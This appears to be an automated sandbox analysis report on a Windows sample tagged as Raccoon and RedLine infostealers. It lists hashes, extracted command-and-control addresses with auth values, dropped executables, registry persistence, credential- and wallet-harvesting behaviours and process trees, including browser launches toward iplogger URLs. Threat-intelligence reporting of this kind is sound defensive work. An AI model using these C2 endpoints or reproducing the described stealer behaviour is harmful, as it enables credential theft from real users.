raccoon | c745f52646d04d51894ca6ca906021647619e87586d1c2f63a01810163371680

Analysis

max time kernel
147s
max time network
156s
platform
windows10-2004_x64
resource
win10v2004-20220721-en
resource tags

arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system
submitted
02-08-2022 02:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9fb6d8d858356655020121ba71714855.exe
Size

973KB
MD5

9fb6d8d858356655020121ba71714855
SHA1

0eb0ff1779c63efbf18f7c1d21643400595c4b7a
SHA256

c745f52646d04d51894ca6ca906021647619e87586d1c2f63a01810163371680
SHA512

1a0302a96d23cdb0ca3453087209135c1bdc5bf4f5320463871136cf5725289532a1220504d7ef3cf878f086aaf2e2c601df4feb30dd449c95e69819aa913f78

Score

10^/10

raccoon redline 4 @tag12312341 afb5c633c4650f69312baef49db9dfa4 f0c8034c83808635df0d9d8726d1bfd6 nam3 discovery infostealer persistence spyware stealer

Malware Config

Extracted

Family

redline

Botnet

nam3

103.89.90.61:18728

Attributes

auth_value
64b900120bbceaa6a9c60e9079492895

Extracted

Family

redline

Botnet

31.41.244.134:11643

Attributes

auth_value
a516b2d034ecd34338f12b50347fbd92

Extracted

Family

redline

Botnet

@tag12312341

62.204.41.144:14096

Attributes

auth_value
71466795417275fac01979e57016e277

Extracted

Family

raccoon

Botnet

afb5c633c4650f69312baef49db9dfa4

http://77.73.132.84

rc4.plain

Extracted

Family

redline

185.215.113.46:8223

Attributes

auth_value
1c36b510dbc8ee0265942899b008d972

Extracted

Family

raccoon

Botnet

f0c8034c83808635df0d9d8726d1bfd6

http://45.95.11.158/

rc4.plain

Signatures

Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
stealer raccoon

Raccoon Stealer payload 7 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3004-234-0x0000000002160000-0x0000000002176000-memory.dmp	family_raccoon
behavioral2/memory/3004-236-0x0000000000400000-0x00000000004B5000-memory.dmp	family_raccoon
behavioral2/memory/3004-287-0x0000000000400000-0x00000000004B5000-memory.dmp	family_raccoon
behavioral2/memory/3004-293-0x0000000000400000-0x00000000004B5000-memory.dmp	family_raccoon
behavioral2/memory/5368-298-0x00000000001E0000-0x00000000001EF000-memory.dmp	family_raccoon
behavioral2/memory/5368-299-0x0000000000400000-0x000000000062B000-memory.dmp	family_raccoon
behavioral2/memory/5368-302-0x0000000000400000-0x000000000062B000-memory.dmp	family_raccoon

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 12 IoCs

Processes:

resource	yara_rule
C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	family_redline
C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	family_redline
behavioral2/memory/5028-162-0x00000000003B0000-0x00000000003F4000-memory.dmp	family_redline
C:\Program Files (x86)\Company\NewProduct\safert44.exe	family_redline
behavioral2/memory/3888-168-0x00000000002D0000-0x0000000000314000-memory.dmp	family_redline
behavioral2/memory/3044-173-0x0000000000FA0000-0x0000000000FC0000-memory.dmp	family_redline
C:\Program Files (x86)\Company\NewProduct\tag.exe	family_redline
C:\Program Files (x86)\Company\NewProduct\safert44.exe	family_redline
C:\Program Files (x86)\Company\NewProduct\tag.exe	family_redline
C:\Program Files (x86)\Company\NewProduct\HappyRoot.exe	family_redline
behavioral2/memory/6612-254-0x0000000000B80000-0x0000000000BA0000-memory.dmp	family_redline
C:\Program Files (x86)\Company\NewProduct\HappyRoot.exe	family_redline

Downloads MZ/PE file

Executes dropped EXE 9 IoCs

Processes:

namdoitntn.exereal.exesafert44.exetag.exekukurzka9000.exeF0geI.exeEU1.exeHappyRoot.exeLittconsultor.exe

pid	process
5028	namdoitntn.exe
1496	real.exe
3888	safert44.exe
3044	tag.exe
3004	kukurzka9000.exe
5368	F0geI.exe
6128	EU1.exe
6612	HappyRoot.exe
7020	Littconsultor.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

9fb6d8d858356655020121ba71714855.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation	9fb6d8d858356655020121ba71714855.exe

Loads dropped DLL 6 IoCs

Processes:

kukurzka9000.exeF0geI.exe

pid process

3004 kukurzka9000.exe
3004 kukurzka9000.exe
3004 kukurzka9000.exe
5368 F0geI.exe
5368 F0geI.exe
5368 F0geI.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Adds Run key to start application 2 TTPs 1 IoCs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

pid	process
3004	kukurzka9000.exe
3004	kukurzka9000.exe
3004	kukurzka9000.exe
5368	F0geI.exe
5368	F0geI.exe
5368	F0geI.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe

Drops file in Program Files directory 11 IoCs

Processes:

9fb6d8d858356655020121ba71714855.exesetup.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	9fb6d8d858356655020121ba71714855.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\tag.exe	9fb6d8d858356655020121ba71714855.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	9fb6d8d858356655020121ba71714855.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\Littconsultor.exe	9fb6d8d858356655020121ba71714855.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\EU1.exe	9fb6d8d858356655020121ba71714855.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\d74f58da-5e50-4ee6-8817-9b3a27c90c9c.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220802023223.pma	setup.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\real.exe	9fb6d8d858356655020121ba71714855.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\safert44.exe	9fb6d8d858356655020121ba71714855.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\F0geI.exe	9fb6d8d858356655020121ba71714855.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\HappyRoot.exe	9fb6d8d858356655020121ba71714855.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

6092 5368 WerFault.exe F0geI.exe

pid	pid_target	process	target process
6092	5368	WerFault.exe	F0geI.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

real.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	real.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	real.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Suspicious behavior: EnumeratesProcesses 33 IoCs

Processes:

msedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exereal.exenamdoitntn.exepowershell.exeHappyRoot.exetag.exesafert44.exeidentity_helper.exemsedge.exe

pid	process
216	msedge.exe
216	msedge.exe
4392	msedge.exe
4392	msedge.exe
4444	msedge.exe
4444	msedge.exe
3480	msedge.exe
3480	msedge.exe
4112	msedge.exe
4112	msedge.exe
4964	msedge.exe
4964	msedge.exe
5576	msedge.exe
5576	msedge.exe
1496	real.exe
1496	real.exe
5028	namdoitntn.exe
5028	namdoitntn.exe
1740	powershell.exe
1740	powershell.exe
6612	HappyRoot.exe
6612	HappyRoot.exe
3044	tag.exe
3044	tag.exe
1740	powershell.exe
3888	safert44.exe
3888	safert44.exe
6780	identity_helper.exe
6780	identity_helper.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe
3184	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs

Processes:

msedge.exe

pid	process
4964	msedge.exe
4964	msedge.exe
4964	msedge.exe
4964	msedge.exe
4964	msedge.exe
4964	msedge.exe
4964	msedge.exe
4964	msedge.exe
4964	msedge.exe
4964	msedge.exe
4964	msedge.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

namdoitntn.exepowershell.exeHappyRoot.exetag.exesafert44.exe

description	pid	process
Token: SeDebugPrivilege	5028	namdoitntn.exe
Token: SeDebugPrivilege	1740	powershell.exe
Token: SeDebugPrivilege	6612	HappyRoot.exe
Token: SeDebugPrivilege	3044	tag.exe
Token: SeDebugPrivilege	3888	safert44.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

msedge.exe

pid process

4964 msedge.exe
4964 msedge.exe
4964 msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

9fb6d8d858356655020121ba71714855.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exe

description	pid	process	target process
PID 4248 wrote to memory of 4964	4248	9fb6d8d858356655020121ba71714855.exe	msedge.exe
PID 4248 wrote to memory of 4964	4248	9fb6d8d858356655020121ba71714855.exe	msedge.exe
PID 4248 wrote to memory of 460	4248	9fb6d8d858356655020121ba71714855.exe	msedge.exe
PID 4248 wrote to memory of 460	4248	9fb6d8d858356655020121ba71714855.exe	msedge.exe
PID 4248 wrote to memory of 1296	4248	9fb6d8d858356655020121ba71714855.exe	msedge.exe
PID 4248 wrote to memory of 1296	4248	9fb6d8d858356655020121ba71714855.exe	msedge.exe
PID 460 wrote to memory of 4976	460	msedge.exe	msedge.exe
PID 460 wrote to memory of 4976	460	msedge.exe	msedge.exe
PID 4964 wrote to memory of 2896	4964	msedge.exe	msedge.exe
PID 4964 wrote to memory of 2896	4964	msedge.exe	msedge.exe
PID 4248 wrote to memory of 3056	4248	9fb6d8d858356655020121ba71714855.exe	msedge.exe
PID 4248 wrote to memory of 3056	4248	9fb6d8d858356655020121ba71714855.exe	msedge.exe
PID 1296 wrote to memory of 4656	1296	msedge.exe	msedge.exe
PID 1296 wrote to memory of 4656	1296	msedge.exe	msedge.exe
PID 3056 wrote to memory of 2628	3056	msedge.exe	msedge.exe
PID 3056 wrote to memory of 2628	3056	msedge.exe	msedge.exe
PID 4248 wrote to memory of 4156	4248	9fb6d8d858356655020121ba71714855.exe	msedge.exe
PID 4248 wrote to memory of 4156	4248	9fb6d8d858356655020121ba71714855.exe	msedge.exe
PID 4156 wrote to memory of 3868	4156	msedge.exe	msedge.exe
PID 4156 wrote to memory of 3868	4156	msedge.exe	msedge.exe
PID 4248 wrote to memory of 3992	4248	9fb6d8d858356655020121ba71714855.exe	msedge.exe
PID 4248 wrote to memory of 3992	4248	9fb6d8d858356655020121ba71714855.exe	msedge.exe
PID 3992 wrote to memory of 1704	3992	msedge.exe	msedge.exe
PID 3992 wrote to memory of 1704	3992	msedge.exe	msedge.exe
PID 4248 wrote to memory of 5028	4248	9fb6d8d858356655020121ba71714855.exe	namdoitntn.exe
PID 4248 wrote to memory of 5028	4248	9fb6d8d858356655020121ba71714855.exe	namdoitntn.exe
PID 4248 wrote to memory of 5028	4248	9fb6d8d858356655020121ba71714855.exe	namdoitntn.exe
PID 4248 wrote to memory of 1496	4248	9fb6d8d858356655020121ba71714855.exe	real.exe
PID 4248 wrote to memory of 1496	4248	9fb6d8d858356655020121ba71714855.exe	real.exe
PID 4248 wrote to memory of 1496	4248	9fb6d8d858356655020121ba71714855.exe	real.exe
PID 4964 wrote to memory of 1856	4964	msedge.exe	msedge.exe
PID 4964 wrote to memory of 1856	4964	msedge.exe	msedge.exe
PID 4964 wrote to memory of 1856	4964	msedge.exe	msedge.exe
PID 4964 wrote to memory of 1856	4964	msedge.exe	msedge.exe
PID 4964 wrote to memory of 1856	4964	msedge.exe	msedge.exe
PID 4964 wrote to memory of 1856	4964	msedge.exe	msedge.exe
PID 4964 wrote to memory of 1856	4964	msedge.exe	msedge.exe
PID 4964 wrote to memory of 1856	4964	msedge.exe	msedge.exe
PID 4964 wrote to memory of 1856	4964	msedge.exe	msedge.exe
PID 4964 wrote to memory of 1856	4964	msedge.exe	msedge.exe
PID 4964 wrote to memory of 1856	4964	msedge.exe	msedge.exe
PID 4964 wrote to memory of 1856	4964	msedge.exe	msedge.exe
PID 4964 wrote to memory of 1856	4964	msedge.exe	msedge.exe
PID 4964 wrote to memory of 1856	4964	msedge.exe	msedge.exe
PID 4964 wrote to memory of 1856	4964	msedge.exe	msedge.exe
PID 4964 wrote to memory of 1856	4964	msedge.exe	msedge.exe
PID 4964 wrote to memory of 1856	4964	msedge.exe	msedge.exe
PID 4964 wrote to memory of 1856	4964	msedge.exe	msedge.exe
PID 4964 wrote to memory of 1856	4964	msedge.exe	msedge.exe
PID 4964 wrote to memory of 1856	4964	msedge.exe	msedge.exe
PID 4964 wrote to memory of 1856	4964	msedge.exe	msedge.exe
PID 4964 wrote to memory of 1856	4964	msedge.exe	msedge.exe
PID 4964 wrote to memory of 1856	4964	msedge.exe	msedge.exe
PID 4964 wrote to memory of 1856	4964	msedge.exe	msedge.exe
PID 4964 wrote to memory of 1856	4964	msedge.exe	msedge.exe
PID 4964 wrote to memory of 1856	4964	msedge.exe	msedge.exe
PID 4964 wrote to memory of 1856	4964	msedge.exe	msedge.exe
PID 4964 wrote to memory of 1856	4964	msedge.exe	msedge.exe
PID 4964 wrote to memory of 1856	4964	msedge.exe	msedge.exe
PID 4964 wrote to memory of 1856	4964	msedge.exe	msedge.exe
PID 4964 wrote to memory of 1856	4964	msedge.exe	msedge.exe
PID 4964 wrote to memory of 1856	4964	msedge.exe	msedge.exe
PID 4964 wrote to memory of 1856	4964	msedge.exe	msedge.exe
PID 4964 wrote to memory of 1856	4964	msedge.exe	msedge.exe

C:\Users\Admin\AppData\Local\Temp\9fb6d8d858356655020121ba71714855.exe
"C:\Users\Admin\AppData\Local\Temp\9fb6d8d858356655020121ba71714855.exe"
1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4248

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1RyjC4
2⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4964

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9dfd346f8,0x7ff9dfd34708,0x7ff9dfd34718
3⤵
PID:2896

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1956,326052834020946553,13022012206181926621,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2040 /prefetch:2
3⤵
PID:1856

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1956,326052834020946553,13022012206181926621,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4392

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1956,326052834020946553,13022012206181926621,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2828 /prefetch:8
3⤵
PID:5116

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,326052834020946553,13022012206181926621,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
3⤵
PID:5564

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,326052834020946553,13022012206181926621,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
3⤵
PID:5392

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,326052834020946553,13022012206181926621,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3868 /prefetch:1
3⤵
PID:6000

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,326052834020946553,13022012206181926621,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4160 /prefetch:1
3⤵
PID:6148

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,326052834020946553,13022012206181926621,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4876 /prefetch:1
3⤵
PID:6384

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,326052834020946553,13022012206181926621,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5240 /prefetch:1
3⤵
PID:6452

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,326052834020946553,13022012206181926621,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5580 /prefetch:1
3⤵
PID:6564

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,326052834020946553,13022012206181926621,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6464 /prefetch:1
3⤵
PID:6892

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,326052834020946553,13022012206181926621,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1
3⤵
PID:7152

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,326052834020946553,13022012206181926621,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:1
3⤵
PID:6024

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,326052834020946553,13022012206181926621,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6344 /prefetch:1
3⤵
PID:6340

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1956,326052834020946553,13022012206181926621,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6120 /prefetch:8
3⤵
PID:3180

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1956,326052834020946553,13022012206181926621,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6972 /prefetch:8
3⤵
PID:1876

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
3⤵
- Drops file in Program Files directory
PID:1664

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0x7ff6a6d85460,0x7ff6a6d85470,0x7ff6a6d85480
4⤵
PID:4056

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1956,326052834020946553,13022012206181926621,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6972 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:6780

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1956,326052834020946553,13022012206181926621,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1672 /prefetch:8
3⤵
PID:2380

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1956,326052834020946553,13022012206181926621,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4660 /prefetch:8
3⤵
PID:5808

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1956,326052834020946553,13022012206181926621,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4652 /prefetch:8
3⤵
PID:4956

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1956,326052834020946553,13022012206181926621,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4648 /prefetch:2
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3184

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1956,326052834020946553,13022012206181926621,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8680 /prefetch:8
3⤵
PID:3320

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1956,326052834020946553,13022012206181926621,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3088 /prefetch:8
3⤵
PID:5160

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1A4aK4
2⤵
- Suspicious use of WriteProcessMemory
PID:460

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9dfd346f8,0x7ff9dfd34708,0x7ff9dfd34718
3⤵
PID:4976

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2056,4103543888566421914,12916671468947221017,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:3
3⤵
